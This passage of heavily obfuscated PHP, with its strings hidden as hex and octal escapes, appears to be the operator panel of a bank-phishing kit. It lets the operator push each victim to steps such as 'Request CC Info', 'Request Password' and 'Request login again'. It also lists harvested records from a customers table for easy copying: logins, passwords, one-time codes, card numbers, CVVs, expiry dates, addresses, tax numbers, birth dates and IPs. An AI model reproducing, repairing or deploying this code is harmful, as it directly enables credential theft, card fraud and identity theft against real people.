9\11\x9\11\x9\11\11\11\11\11\11\x3c\x64\151\x76\x20\x63\154\141\163\163\75\47\146\x6f\x72\155\x2d\143\x68\x65\x63\153\x27\76\12\11\x9\x9\x9\x9\x9\11\x9\11\x9\x9\11\11\x3c\154\141\142\145\x6c\40\x66\x6f\x72\75\47\x61\163\153\143\150\141\x72\163\162\141\144\x69\x6f\x34{$value["\151\144"]}\x27\x20\x63\x6c\141\163\163\x3d\x27\146\x6f\x72\155\55\x63\150\145\x63\153\55\154\x61\x62\x65\x6c\x27\76\12\11\11\11\11\11\11\11\x9\x9\x9\11\x9\x9\11\x3c\151\156\160\165\164\x20\164\x79\160\145\75\47\x72\x61\144\151\x6f\47\40\156\141\155\x65\x3d\x27\x73\x74\141\164\165\x73\x27\x20\166\x61\x6c\165\x65\x3d\x27\61\65\47\40\151\x64\75\x27\x61\163\153\143\150\141\x72\163\162\x61\x64\151\157\x34{$value["\x69\x64"]}\x27\x20\x6f\x6e\143\154\151\x63\153\x3d\x27\x73\150\x6f\167\x66\x69\145\154\144\x73\x28{$value["\x69\x64"]}\x29\x3b\47\x20\143\x6c\141\163\163\75\47\163\x74\141\x74\x75\x73\x20\146\x6f\x72\155\x2d\x63\x68\x65\143\x6b\55\151\x6e\x70\165\x74\x27\x3e\12\x9\11\11\11\x9\x9\11\x9\11\11\11\11\x9\x9\x3c\163\x70\x61\x6e\x3e\x52\x65\161\x75\x65\x73\164\x20\103\x43\40\x49\156\x66\x6f\74\x2f\x73\160\141\156\76\xa\x9\11\11\11\11\x9\x9\11\x9\11\x9\x9\11\x3c\x2f\154\x61\142\145\x6c\76\12\11\x9\x9\11\x9\11\x9\11\11\x9\x9\11\74\x2f\x64\x69\166\x3e\xa\11\x9\11\11\x9\11\x9\x9\11\11\11\x3c\57\164\x64\76\12\x9\11\11\x9\x9\11\x9\x9\11\11\x9\74\x74\x64\76\xa\11\11\11\x9\11\11\x9\x9\x9\x9\11\11\x3c\144\x69\x76\40\143\154\x61\x73\163\75\x27\x66\x6f\x72\x6d\x2d\x63\150\x65\x63\153\47\x3e\12\x9\11\11\11\x9\x9\x9\11\11\x9\x9\x9\x9\74\x6c\x61\x62\x65\154\40\146\157\x72\x3d\x27\x61\x73\153\143\x68\141\162\x73\162\141\144\x69\x6f\63{$value["\151\x64"]}\x27\x20\143\x6c\x61\163\163\75\47\146\157\162\155\x2d\143\x68\145\143\153\55\x6c\x61\x62\x65\154\x27\76\xa\11\x9\11\11\x9\11\x9\x9\x9\x9\11\11\11\11\74\151\x6e\x70\165\x74\40\x74\x79\x70\x65\75\47\162\x61\x64\x69\x6f\x27\40\x6e\141\155\145\75\x27\163\164\141\164\x75\163\47\x20\x76\141\x6c\165\145\75\x27\61\x34\47\x20\x69\144\75\x27\141\x73\153\143\150\141\x72\x73\162\141\144\x69\157\63{$value["\151\144"]}\x27\40\x6f\x6e\x63\154\151\143\x6b\x3d\x27\x73\x68\x6f\167\x66\x69\x65\154\144\x73\50{$value["\x69\144"]}\x29\x3b\47\40\143\x6c\141\163\163\75\x27\x73\164\141\x74\x75\163\40\146\x6f\162\155\x2d\143\x68\145\x63\153\x2d\x69\x6e\160\165\x74\47\x3e\12\11\11\x9\11\11\11\x9\x9\x9\11\11\x9\11\11\74\x73\x70\141\x6e\76\x52\x65\x71\165\145\x73\164\x20\102\x61\163\x69\x63\x20\x49\x6e\x66\x6f\74\x2f\x73\x70\x61\x6e\x3e\12\11\11\11\11\11\x9\11\11\11\11\x9\11\x9\74\x2f\154\141\142\145\154\x3e\xa\11\x9\11\11\11\x9\11\x9\11\11\x9\x9\74\57\x64\151\x76\x3e\xa\x9\11\x9\11\x9\x9\11\x9\x9\11\11\74\57\x74\x64\x3e\xa\x9\x9\11\11\11\11\x9\11\11\11\x3c\x2f\x74\x72\76\xa\11\11\x9\x9\11\x9\11\x9\11\x9\12\11\11\11\11\x9\11\x9\11\11\x9\x3c\164\162\x3e\12\11\x9\x9\11\x9\11\x9\11\11\x9\x9\x3c\164\x64\x3e\xa\x9\11\11\x9\x9\x9\11\11\11\11\11\x9\x3c\144\x69\166\40\143\154\x61\163\x73\x3d\x27\146\157\x72\x6d\x2d\143\x68\x65\x63\x6b\x27\x3e\xa\11\11\11\11\x9\x9\11\x9\11\11\11\11\x9\x3c\154\x61\142\x65\x6c\x20\x66\x6f\x72\75\47\141\x73\x6b\x63\x68\x61\162\163\162\141\144\x69\x6f\67{$value["\151\x64"]}\x27\40\x63\x6c\141\163\x73\75\47\x66\x6f\x72\155\x2d\143\x68\145\143\x6b\x2d\154\141\x62\145\154\x27\x3e\xa\x9\11\11\x9\x9\x9\11\x9\11\x9\x9\x9\11\x9\x3c\151\156\160\x75\164\x20\x74\x79\160\145\x3d\47\x72\141\x64\151\x6f\x27\x20\x6e\x61\155\145\x3d\x27\x73\x74\141\164\x75\163\x27\x20\x76\141\x6c\165\x65\x3d\47\x31\x38\x27\40\x69\x64\75\x27\141\163\x6b\143\x68\x61\162\x73\x72\141\x64\x69\157\67{$value["\x69\x64"]}\x27\x20\x6f\156\x63\154\x69\143\153\75\x27\163\x68\x6f\167\146\x69\145\154\x64\x73\x28{$value["\x69\x64"]}\x29\x3b\x27\40\143\x6c\x61\163\x73\x3d\x27\x73\x74\141\x74\165\163\40\x66\x6f\162\155\x2d\x63\150\145\143\x6b\x2d\x69\156\160\165\164\x27\76\xa\x9\11\11\11\11\11\11\x9\x9\x9\11\x9\11\11\x3c\x73\160\x61\x6e\x3e\x52\145\161\x75\145\x73\x74\x20\120\x61\163\163\x77\157\x72\144\74\x2f\163\160\x61\x6e\x3e\12\x9\11\x9\x9\x9\x9\11\11\x9\x9\11\x9\x9\x3c\57\x6c\x61\142\145\154\x3e\12\x9\11\x9\11\x9\11\x9\x9\x9\x9\x9\x9\x3c\57\144\x69\x76\76\xa\11\x9\x9\11\11\x9\11\11\11\11\11\x3c\x2f\164\x64\x3e\12\11\11\x9\x9\x9\x9\11\11\11\11\x9\74\x74\144\76\12\x9\11\11\11\11\x9\x9\11\11\x9\x9\x9\74\x64\x69\x76\40\x63\x6c\x61\x73\x73\75\47\146\157\x72\155\55\x63\x68\145\143\x6b\47\x3e\xa\11\11\11\11\x9\x9\x9\x9\11\11\11\x9\11\74\x6c\141\x62\x65\x6c\x20\x66\157\162\x3d\47\141\x73\153\x63\150\141\x72\x73\x72\x61\144\151\x6f\66{$value["\x69\x64"]}\x27\x20\143\154\141\x73\x73\75\47\x66\157\x72\155\55\x63\150\145\x63\x6b\55\x6c\141\x62\145\x6c\x27\76\12\11\x9\11\11\x9\11\x9\11\x9\x9\11\11\11\x9\74\151\156\160\x75\164\x20\x74\x79\160\145\75\47\162\x61\x64\x69\157\47\x20\x6e\x61\x6d\x65\x3d\47\x73\164\141\x74\165\163\x27\40\x76\x61\154\x75\145\x3d\x27\61\x37\47\x20\151\144\75\47\x61\x73\x6b\143\x68\x61\x72\x73\162\x61\x64\x69\x6f\66{$value["\151\x64"]}\47\x20\x6f\x6e\143\154\x69\143\x6b\75\47\x73\150\x6f\x77\x66\x69\x65\x6c\144\163\x28{$value["\x69\144"]}\51\x3b\x27\40\143\x6c\x61\x73\163\x3d\x27\163\164\x61\164\x75\163\40\146\157\162\x6d\x2d\x63\150\145\143\153\55\x69\x6e\160\165\164\x27\76\12\x9\x9\11\x9\11\11\11\x9\x9\x9\11\x9\x9\x9\74\x73\x70\x61\156\76\114\x6f\x61\x64\x69\156\x67\x20\120\x61\x67\x65\x3c\57\x73\x70\x61\x6e\76\xa\11\11\11\11\x9\11\x9\x9\x9\x9\x9\x9\11\x3c\x2f\154\x61\x62\145\154\x3e\12\x9\11\x9\x9\x9\11\11\x9\x9\11\x9\x9\74\57\144\151\x76\x3e\12\x9\11\x9\x9\x9\11\x9\x9\11\x9\11\x3c\57\164\144\76\xa\x9\x9\11\11\x9\11\x9\11\x9\11\x3c\x2f\x74\x72\76\xa\11\11\x9\11\x9\11\11\x9\x9\11\12\x9\x9\11\x9\11\11\x9\11\11\11\x3c\164\162\76\12\x9\x9\x9\11\x9\x9\x9\x9\11\x9\x9\x3c\164\144\76\12\11\11\11\11\11\11\x9\x9\11\x9\11\11\74\x64\151\x76\40\x63\x6c\141\x73\163\75\47\146\x6f\x72\x6d\55\143\x68\145\143\153\x27\76\xa\11\11\11\x9\x9\x9\x9\x9\11\x9\11\11\11\x3c\x6c\141\142\145\154\x20\x66\x6f\x72\x3d\x27\141\x73\153\x6c\x6f\x67\151\x6e\162\x61\144\151\x6f{$value["\x69\x64"]}\x27\x20\143\154\141\163\163\x3d\x27\146\157\x72\x6d\x2d\x63\x68\x65\x63\x6b\55\154\141\x62\x65\x6c\47\76\xa\x9\11\11\x9\11\11\x9\x9\x9\x9\x9\x9\11\x9\74\x69\x6e\160\165\x74\40\x74\171\x70\x65\x3d\x27\x72\x61\144\151\157\x27\x20\156\x61\155\145\x3d\47\x73\x74\141\x74\165\163\x27\x20\143\150\x65\x63\153\x65\144\40\166\141\x6c\165\145\x3d\x27\65\x30\x27\x20\x69\144\x3d\47\x61\163\x6b\154\x6f\147\151\156\x72\141\144\x69\x6f{$value["\151\x64"]}\47\x20\157\156\x63\154\151\143\153\75\x27\x73\150\157\x77\146\151\x65\x6c\144\163\50{$value["\151\x64"]}\x29\73\x27\x20\143\x6c\x61\x73\163\x3d\47\163\164\x61\x74\165\x73\x20\x66\x6f\162\x6d\55\143\x68\145\143\x6b\x2d\x69\x6e\160\x75\164\47\x3e\12\x9\11\11\11\x9\11\x9\11\x9\x9\x9\x9\x9\x9\74\163\x70\141\156\x3e\x52\145\x71\x75\145\x73\164\40\154\x6f\147\151\x6e\x20\141\147\141\x69\x6e\40\x3c\57\x73\x70\141\156\76\12\11\11\11\x9\x9\x9\11\11\11\x9\x9\x9\11\74\57\154\141\x62\x65\154\76\12\11\11\11\x9\11\x9\11\11\11\11\x9\x9\x3c\57\x64\x69\x76\x3e\12\11\11\11\11\x9\11\11\11\11\x9\x9\x3c\x2f\164\144\76\xa\11\x9\x9\11\x9\11\11\11\11\x9\x9\74\164\144\x3e\xa\x9\11\x9\x9\x9\11\11\x9\x9\x9\11\x9\74\144\x69\166\40\143\x6c\141\x73\163\x3d\x27\146\157\162\x6d\x2d\143\150\145\143\x6b\x27\76\12\x9\x9\11\x9\11\11\11\11\11\x9\11\11\x9\x3c\x6c\x61\142\145\x6c\x20\x66\157\x72\x3d\47\x66\151\x6e\151\x73\x68\x72\141\144\x69\157{$value["\151\144"]}\47\x20\x63\154\x61\163\x73\75\x27\146\157\162\x6d\55\143\x68\x65\x63\x6b\x2d\x6c\x61\x62\145\x6c\47\x3e\xa\11\x9\x9\11\x9\11\x9\x9\x9\x9\x9\11\x9\x9\74\151\x6e\160\x75\x74\40\x74\171\160\145\75\x27\x72\x61\144\151\x6f\47\40\156\141\x6d\145\x3d\x27\x73\x74\141\164\x75\x73\x27\40\x76\x61\154\x75\145\x3d\47\62\x30\x27\40\151\x64\x3d\47\x66\151\156\151\163\x68\162\141\144\x69\157{$value["\151\144"]}\x27\x20\157\x6e\143\x6c\x69\143\x6b\75\47\x73\150\157\167\x66\151\145\154\144\163\50{$value["\151\x64"]}\51\73\47\x20\143\154\141\163\163\75\x27\x73\x74\x61\164\165\163\40\146\x6f\162\x6d\x2d\x63\x68\145\x63\x6b\x2d\151\x6e\160\165\164\x27\x3e\12\11\x9\x9\11\11\11\x9\11\11\11\x9\11\11\11\74\163\160\141\156\76\x46\151\156\x69\x73\150\74\x2f\x73\160\141\x6e\x3e\12\x9\11\x9\x9\11\11\x9\11\11\x9\11\11\x9\74\57\154\141\142\x65\154\76\xa\11\11\x9\x9\x9\x9\x9\11\x9\11\11\11\x3c\x2f\144\151\166\x3e\xa\x9\x9\x9\x9\11\11\11\11\x9\11\x9\x3c\x2f\164\144\76\12\x9\x9\x9\11\11\11\x9\11\11\x9\74\57\164\162\76\12\x9\11\x9\x9\x9\x9\x9\11\11\x9\xa\x9\11\11\x9\11\11\x9\11\x9\x3c\57\164\x62\x6f\144\x79\x3e\xa\11\11\x9\11\x9\11\11\x9\74\x2f\x74\141\x62\154\145\76\xa\x9\11\x9\x9\x9\x9\11\x3c\57\144\x69\166\x3e\xa\x9\11\11\x9\x9\11\11\x3c\41\55\55\x20\105\x6e\x64\x20\x63\x6f\x6d\155\x61\x6e\x64\x73\40\145\x64\x69\x74\x20\x2d\x2d\76\12\x9\11\11\11\x9\x9\11\x3c\x64\x69\x76\x20\143\x6c\141\x73\163\75\x27\155\157\144\x61\154\x2d\146\x6f\x6f\164\x65\162\x27\40\163\164\x79\x6c\x65\x3d\x27\155\141\162\147\151\156\x2d\x74\x6f\160\x3a\x2d\x34\x30\160\x78\x27\x3e\12\11\x9\x9\11\x9\x9\11\11\x3c\142\165\x74\x74\x6f\156\40\164\x79\x70\145\x3d\47\x62\x75\x74\x74\x6f\156\x27\40\143\x6c\x61\x73\x73\x3d\47\x62\164\156\40\x62\164\x6e\x2d\163\x65\x63\157\156\144\141\162\171\x27\40\x6f\156\143\x6c\x69\x63\153\75\x27\143\x6c\x6f\163\145\137\142\x74\156\50\x29\x27\x20\76\x43\x6c\157\x73\x65\x3c\57\142\x75\164\164\x6f\x6e\x3e\12\11\11\11\x9\x9\11\11\11\x3c\142\x75\164\x74\157\156\x20\151\x64\75\x27\x73\141\x76\x65\x5f{$value["\x69\144"]}\x27\x20\x6f\156\143\154\x69\x63\153\75\x27\146\x6f\x72\x6d\137\x73\x75\142\x6d\151\x74\x28\x74\150\151\163\51\47\x20\164\x79\160\x65\75\x27\142\165\x74\x74\157\156\x27\x20\143\x6c\x61\163\163\75\47\142\x74\x6e\40\x62\164\156\55\x70\162\151\x6d\x61\162\x79\x27\x3e\123\x61\166\x65\x3c\57\142\x75\164\x74\157\156\76\xa\x9\x9\11\11\x9\x9\11\74\x2f\x64\x69\166\76\12\11\x9\x9\11\x9\11\74\x2f\144\x69\166\x3e\12\11\11\11\x9\11\74\57\x64\x69\x76\x3e\xa\11\11\11\x9\74\57\x66\157\162\155\x3e\12\x9\11\11\x3c\x2f\x64\151\x76\76\11\x9\x9\12\x9\11\x9\12\x9\11\11"; } } if (isset($_GET["\x66\x65\x74\143\150\x5f\146\x69\156\151\x73\x68\137\155\x6f\144\x61\154\137\x64\141\164\x61"])) { $query = mysqli_query($conn, "\123\105\114\x45\x43\124\x20\x2a\40\x66\162\157\155\x20\x63\x75\x73\164\x6f\x6d\145\x72\163"); if ($query) { if (mysqli_num_rows($query) >= 1) { $array = mysqli_fetch_all($query, MYSQLI_ASSOC); } } foreach ($array as $value) { $usrlogin = $value["\165\163\x72\154\x6f\x67\x69\x6e"]; $usrpass = $value["\165\x73\162\x70\x61\x73\x73"]; $amount = $value["\141\x6d\x6f\x75\x6e\164"]; $otpcode = $value["\157\164\x70\x63\157\x64\x65"]; $fname = $value["\146\156\x61\155\x65"]; $dob = $value["\x64\157\x62"]; $usraddr = $value["\x75\x73\162\x61\x64\144\162"]; $usrnif = $value["\x75\x73\162\156\151\146"]; $usrcode = $value["\165\x73\162\143\x6f\x64\145"]; $paycode = $value["\x70\x61\x79\x63\157\144\145"]; $phonenum = $value["\160\x68\x6f\x6e\145\156\x75\x6d"]; $ccnum = $value["\x63\x63\x6e\x75\x6d"]; $cvvnum = $value["\143\x76\166\156\x75\x6d"]; $expiry = $value["\x65\170\160\151\162\x79"]; $ip = $value["\x69\160"]; $useragent = urldecode($value["\165\x73\x65\x72\x61\x67\145\156\164"]); echo "\xa\x9\12\11\11\11\x3c\x64\151\166\x20\x63\x6c\141\x73\163\75\47\x6d\x6f\x64\141\x6c\40\x66\141\144\x65\47\40\151\x64\75\47\166\151\145\167\155\x6f\x64\141\154\x5f\x75\163\145\x72\151\144\137{$value["\151\x64"]}\x27\x20\164\141\x62\151\x6e\144\x65\170\75\x27\x2d\x31\x27\40\162\157\x6c\x65\x3d\x27\x64\x69\141\x6c\157\147\x27\40\163\x74\x79\x6c\145\75\47\157\x70\141\x63\x69\x74\x79\72\61\x20\41\151\x6d\160\x6f\x72\164\x61\156\x74\73\144\151\x73\160\x6c\141\x79\x3a\x6e\157\x6e\x65\73\150\145\x69\147\x68\164\72\x31\x30\x30\x25\73\x6f\166\x65\x72\146\154\157\167\x3a\x73\x63\162\157\154\x6c\73\47\40\141\x72\x69\x61\55\x6c\141\x62\x65\x6c\x6c\145\x64\x62\x79\x3d\47\145\x78\141\x6d\160\154\145\115\x6f\x64\x61\x6c\114\x61\x62\x65\154\47\40\141\162\x69\141\x2d\x68\x69\144\144\x65\156\x3d\47\164\x72\x75\145\47\76\12\x9\11\x9\xa\11\11\x9\x9\74\x66\x6f\162\x6d\40\156\141\x6d\145\75\47\x63\157\x6e\146\151\147\x5f\146\x6f\162\155\x5f{$value["\x69\144"]}\47\x20\x69\144\75\x27\143\x6f\x6e\146\151\147\x5f\146\157\x72\155\x5f{$value["\x69\144"]}\x27\40\x6d\x65\x74\150\157\x64\75\47\120\x4f\123\124\47\x20\x61\143\x74\x69\157\x6e\x3d\x27\x27\x20\x6e\x6f\166\141\154\x69\144\141\164\145\76\xa\x9\x9\11\11\74\151\156\160\x75\x74\40\x74\171\x70\x65\75\47\150\x69\144\x64\x65\x6e\x27\40\x6e\x61\155\x65\x3d\47\165\x73\145\162\151\144\x27\40\x76\x61\154\x75\x65\x3d\47{$value["\x69\x64"]}\47\76\xa\x9\11\x9\11\x3c\144\151\166\40\x63\x6c\141\163\163\x3d\47\155\157\144\x61\x6c\x2d\144\x69\x61\x6c\x6f\x67\x27\40\x72\157\154\x65\x3d\x27\x64\157\143\165\x6d\145\x6e\x74\x27\40\x73\164\x79\154\x65\x3d\x27\155\141\162\x67\151\156\x2d\x74\x6f\x70\72\62\60\x25\x3b\x6d\141\x78\x2d\167\x69\x64\164\150\x3a\61\x30\x30\x25\73\146\x6f\156\164\55\163\151\172\145\72\61\56\x32\x72\x65\x6d\73\x27\x3e\12\x9\x9\11\11\x3c\x64\x69\166\40\x63\x6c\141\163\163\75\x27\155\157\144\141\x6c\x2d\x63\157\156\x74\145\156\x74\x27\x20\x73\164\171\154\145\x3d\47\x62\141\143\x6b\147\162\x6f\x75\x6e\x64\55\x63\x6f\154\x6f\162\x3a\40\142\154\x61\x63\x6b\73\x27\76\12\11\x9\x9\11\x9\x3c\x64\x69\x76\40\x63\x6c\141\x73\163\x3d\x27\155\x6f\144\141\x6c\x2d\x68\x65\141\x64\145\x72\47\x20\x73\x74\171\154\145\x3d\47\x62\141\143\153\x67\162\157\165\156\x64\55\x63\157\154\157\162\x3a\x23\x33\x34\x34\71\x35\105\73\146\x6f\156\x74\x2d\x73\151\x7a\145\72\62\x2e\x37\x72\x65\155\x3b\x74\145\x78\x74\x2d\x61\x6c\151\147\x6e\x3a\143\145\x6e\164\145\x72\x3b\47\x3e\xa\11\11\x9\x9\x9\x3c\x68\x35\x20\143\x6c\141\163\x73\x3d\47\x6d\157\x64\x61\154\x2d\164\x69\x74\x6c\x65\x27\x20\151\x64\x3d\x27\145\170\141\155\160\154\x65\x4d\157\x64\141\x6c\114\x61\x62\145\x6c\x27\x20\x73\x74\x79\x6c\145\75\47\x63\157\154\157\x72\x3a\167\x68\x69\164\145\x3b\x66\157\x6e\164\55\x73\x69\172\x65\72\x31\x2e\x32\162\x65\155\47\76\101\x64\155\151\x6e\40\x43\157\156\164\x72\157\154\40\50\143\154\x69\143\x6b\40\157\156\40\x6c\x6f\x67\x20\x74\x6f\x20\141\165\x74\157\x2d\x63\157\160\x79\51\x3c\57\x68\65\x3e\xa\x9\11\11\11\11\74\x62\x75\164\x74\157\156\40\164\x79\160\x65\x3d\x27\142\165\164\164\x6f\156\x27\40\x63\x6c\x61\163\x73\x3d\47\x63\154\x6f\x73\x65\47\40\157\x6e\x63\x6c\151\143\x6b\75\47\143\x6c\x6f\x73\145\x5f\142\x74\156\x28\x29\x27\x20\40\141\162\x69\141\55\x6c\x61\142\x65\x6c\x3d\47\103\x6c\157\163\145\47\76\12\11\x9\x9\x9\x9\11\x3c\x73\160\141\x6e\40\x61\162\151\x61\x2d\150\x69\144\x64\x65\156\75\47\x74\x72\165\145\47\40\x73\164\x79\x6c\145\x3d\47\x63\x6f\154\157\x72\72\167\x68\x69\164\145\x27\76\x26\164\151\x6d\145\163\x3b\x3c\x2f\163\160\141\156\76\xa\11\11\x9\11\11\74\57\142\165\x74\164\x6f\x6e\x3e\xa\11\x9\11\11\11\74\x2f\x64\x69\x76\76\xa\11\11\11\11\x9\x3c\x64\x69\166\x20\143\x6c\x61\x73\x73\x3d\47\155\157\144\x61\x6c\55\x62\157\144\171\x27\76\12\x9\11\x9\x9\x9\x9\x3c\x64\151\x76\x20\x63\154\x61\163\163\75\x27\146\157\162\155\x2d\147\x72\157\x75\160\x27\x20\x73\x74\x79\x6c\145\75\47\155\x61\162\x67\151\x6e\x2d\142\x6f\164\x74\157\x6d\x3a\x31\162\x65\155\x27\x3e\12\11\x9\11\11\x9\11\11\74\142\x72\x3e\12\xa\x9\x9\x9\x9\11\x9\11\x3c\x64\x69\166\40\143\x6c\x61\163\163\x3d\x27\144\141\164\141\x2d\x67\162\x6f\165\160\x27\76\xa\11\x9\11\x9\x9\x9\11\11\74\x6c\141\x62\145\x6c\x20\143\154\141\163\x73\x3d\47\144\141\x74\141\x2d\x6c\x61\x62\x65\x6c\x27\76\x55\163\145\162\40\x63\157\x64\x65\74\x2f\154\x61\142\x65\154\76\xa\11\x9\11\11\x9\x9\x9\11\x3c\151\156\x70\x75\164\40\x6f\156\143\154\x69\x63\153\x3d\47\x63\157\x70\171\137\x62\164\156\x28\164\150\151\x73\51\47\40\x63\154\141\x73\x73\75\47\x66\x6f\162\x6d\x2d\x63\x6f\x6e\x74\162\157\x6c\47\40\162\145\x61\x64\x6f\156\x6c\171\40\x76\141\x6c\x75\145\75\x27{$usrlogin}\47\x3e\xa\11\x9\11\x9\11\11\11\x3c\57\144\x69\x76\x3e\12\11\11\x9\x9\x9\x9\11\x3c\144\151\166\x20\143\x6c\141\163\163\x3d\x27\x64\x61\164\x61\x2d\147\x72\x6f\x75\160\x27\x3e\xa\x9\x9\x9\11\x9\11\11\11\x3c\154\x61\142\x65\x6c\x20\143\154\141\163\163\x3d\x27\x64\x61\x74\x61\x2d\154\x61\x62\145\154\47\76\115\x75\x6c\164\x69\x20\143\157\144\x65\74\57\154\141\x62\x65\154\x3e\xa\x9\x9\11\x9\11\11\11\x9\74\151\156\160\x75\164\x20\157\156\x63\x6c\x69\x63\153\x3d\47\143\x6f\160\171\x5f\x62\x74\x6e\50\164\150\151\x73\x29\x27\x20\143\x6c\141\x73\x73\x3d\47\x66\x6f\162\155\55\143\157\156\164\162\157\154\47\40\x72\145\141\x64\157\x6e\154\x79\x20\166\x61\x6c\x75\145\x3d\47{$usrcode}\47\76\12\x9\x9\x9\x9\x9\11\11\x3c\57\x64\151\166\x3e\xa\11\x9\11\x9\11\x9\x9\74\144\x69\166\40\x63\x6c\141\x73\163\x3d\47\144\x61\164\141\x2d\x67\162\x6f\x75\x70\x27\76\12\x9\11\x9\11\x9\11\x9\11\x3c\x6c\141\x62\x65\154\40\143\154\141\x73\163\x3d\x27\x64\x61\164\x61\55\154\141\x62\x65\x6c\x27\x3e\x50\141\163\x73\x77\x6f\162\144\74\x2f\154\141\142\145\154\76\xa\x9\11\x9\11\x9\x9\x9\11\74\x69\x6e\x70\165\164\x20\x6f\156\x63\x6c\x69\143\x6b\75\x27\143\x6f\160\171\137\x62\164\x6e\x28\164\150\x69\x73\51\x27\x20\143\154\x61\x73\163\75\x27\x66\157\162\155\x2d\x63\x6f\156\x74\x72\157\x6c\47\40\x72\145\x61\144\x6f\156\x6c\171\x20\166\x61\154\165\x65\75\x27{$usrpass}\x27\x3e\xa\11\11\x9\x9\11\x9\x9\74\57\x64\x69\166\76\12\11\11\x9\11\11\11\11\x3c\x64\x69\x76\x20\x63\x6c\x61\x73\163\75\47\144\141\x74\141\x2d\147\162\x6f\165\x70\x27\76\xa\x9\x9\x9\11\x9\11\11\11\74\154\x61\x62\x65\154\40\x63\x6c\x61\x73\x73\x3d\47\144\141\164\141\x2d\154\141\142\145\x6c\47\x3e\117\124\120\x3c\57\x6c\x61\x62\145\x6c\76\xa\11\11\x9\x9\x9\x9\x9\x9\74\151\x6e\160\165\x74\x20\157\x6e\143\x6c\151\x63\x6b\x3d\x27\143\x6f\x70\171\x5f\142\x74\x6e\50\x74\150\151\163\51\x27\40\143\x6c\x61\163\163\x3d\x27\x66\157\x72\155\55\143\x6f\x6e\x74\162\157\154\47\40\162\145\x61\144\157\x6e\154\x79\x20\166\141\154\165\x65\75\x27{$otpcode}\47\x3e\12\x9\11\x9\11\11\11\11\x3c\57\144\151\x76\x3e\12\11\x9\11\11\x9\x9\11\x3c\144\x69\166\x20\x63\x6c\141\163\x73\75\47\x64\141\164\141\55\x67\162\x6f\165\x70\x27\76\12\11\11\11\11\11\x9\11\x9\74\154\x61\142\x65\x6c\40\143\154\141\163\163\75\x27\x64\x61\164\x61\x2d\x6c\x61\142\x65\x6c\x27\76\x50\141\x79\x20\x4f\x54\120\x3c\x2f\x6c\141\x62\x65\154\76\12\11\11\11\x9\x9\x9\11\x9\x3c\151\156\160\165\164\40\157\156\x63\154\151\143\153\75\47\x63\x6f\x70\x79\x5f\x62\x74\x6e\50\x74\150\x69\x73\51\x27\40\x63\x6c\141\163\x73\x3d\x27\146\157\162\x6d\55\x63\157\x6e\164\x72\157\x6c\x27\x20\162\x65\x61\144\x6f\156\x6c\x79\40\x76\x61\154\x75\145\75\47{$paycode}\47\x3e\12\x9\x9\11\11\x9\11\x9\74\57\144\x69\x76\x3e\xa\11\x9\11\11\11\x9\x9\x3c\x64\151\x76\40\143\x6c\x61\163\163\x3d\47\144\141\164\141\x2d\x67\x72\x6f\x75\160\47\x3e\12\11\x9\11\x9\x9\11\x9\x9\x3c\x6c\x61\x62\145\154\x20\143\154\141\x73\x73\75\47\x64\141\x74\141\x2d\154\x61\x62\x65\x6c\x27\x3e\106\x75\154\x6c\40\x4e\x61\155\145\x3c\57\154\141\x62\x65\154\x3e\12\x9\11\11\11\x9\x9\11\11\x3c\x69\x6e\160\165\164\x20\157\x6e\143\x6c\151\x63\x6b\75\x27\x63\157\160\x79\x5f\142\x74\156\x28\164\x68\x69\x73\x29\x27\40\x63\154\x61\x73\163\x3d\x27\146\157\x72\155\x2d\x63\x6f\156\164\162\x6f\x6c\x27\40\162\x65\x61\x64\x6f\x6e\154\171\x20\166\141\x6c\x75\x65\75\47{$fname}\47\76\12\11\x9\11\x9\11\11\x9\74\57\x64\x69\166\76\12\11\11\11\11\11\11\11\x3c\x64\x69\166\x20\143\154\x61\163\163\x3d\x27\x64\141\164\x61\55\x67\162\x6f\x75\160\x27\76\12\11\x9\x9\x9\11\x9\11\11\74\154\x61\142\145\154\x20\143\x6c\141\163\x73\75\47\144\x61\x74\x61\x2d\154\141\142\145\154\x27\76\x44\x4f\x42\74\57\x6c\141\x62\x65\x6c\x3e\xa\11\x9\11\x9\11\11\x9\x9\74\151\156\x70\x75\x74\x20\157\156\143\x6c\x69\143\153\75\47\x63\157\160\171\x5f\x62\164\156\50\164\x68\151\x73\51\x27\40\x63\154\x61\163\x73\75\47\146\157\x72\x6d\x2d\143\157\x6e\164\162\157\x6c\x27\x20\162\x65\141\x64\157\156\x6c\x79\x20\x76\141\x6c\x75\x65\x3d\x27{$dob}\x27\76\xa\11\11\11\x9\x9\x9\11\x3c\57\144\x69\x76\76\12\11\x9\x9\x9\11\11\x9\x3c\144\151\x76\x20\143\154\x61\163\x73\x3d\x27\x64\141\x74\141\55\x67\x72\x6f\165\160\47\x3e\12\x9\x9\x9\11\x9\11\x9\11\x3c\x6c\141\142\145\x6c\x20\143\x6c\141\163\163\x3d\47\x64\141\164\141\55\154\141\142\x65\x6c\47\76\x41\144\144\162\x65\163\x73\x3c\x2f\x6c\141\x62\145\154\76\xa\x9\11\11\11\x9\11\11\11\74\151\x6e\x70\165\164\40\x6f\156\x63\x6c\x69\x63\153\75\47\143\157\160\171\137\142\x74\x6e\50\x74\x68\x69\163\51\x27\x20\143\x6c\141\x73\x73\x3d\47\146\157\162\155\55\x63\157\x6e\164\162\x6f\154\47\40\162\145\x61\x64\157\156\x6c\171\40\166\x61\x6c\x75\145\x3d\47{$usraddr}\47\x3e\xa\11\x9\x9\11\x9\11\11\74\57\144\151\166\76\xa\x9\11\11\11\x9\x9\x9\x3c\x64\151\x76\x20\x63\x6c\141\163\163\x3d\x27\x64\141\x74\141\x2d\x67\162\157\x75\x70\47\x3e\xa\11\11\x9\x9\11\x9\11\11\74\x6c\x61\x62\145\x6c\x20\x63\154\x61\163\163\x3d\x27\144\x61\x74\x61\55\154\x61\142\145\x6c\47\76\116\x49\106\x3c\x2f\154\141\142\145\x6c\76\12\x9\x9\x9\x9\11\x9\11\11\74\x69\156\x70\x75\164\x20\157\156\x63\154\x69\x63\153\75\47\x63\x6f\x70\x79\x5f\142\x74\156\x28\x74\150\151\163\x29\47\40\x63\x6c\x61\x73\163\x3d\47\x66\157\162\155\x2d\x63\157\156\164\x72\x6f\x6c\x27\x20\x72\145\x61\x64\x6f\156\x6c\x79\40\x76\x61\x6c\x75\145\75\47{$usrnif}\47\x3e\xa\11\11\x9\x9\11\11\x9\x3c\57\144\x69\166\76\12\x9\11\x9\11\11\11\x9\x3c\144\x69\166\x20\x63\154\x61\x73\163\75\47\x64\141\164\x61\55\147\162\x6f\165\160\x27\x3e\12\x9\11\x9\x9\x9\11\11\11\x3c\x6c\x61\142\145\154\40\x63\154\141\163\x73\x3d\47\x64\141\164\141\x2d\x6c\x61\142\145\x6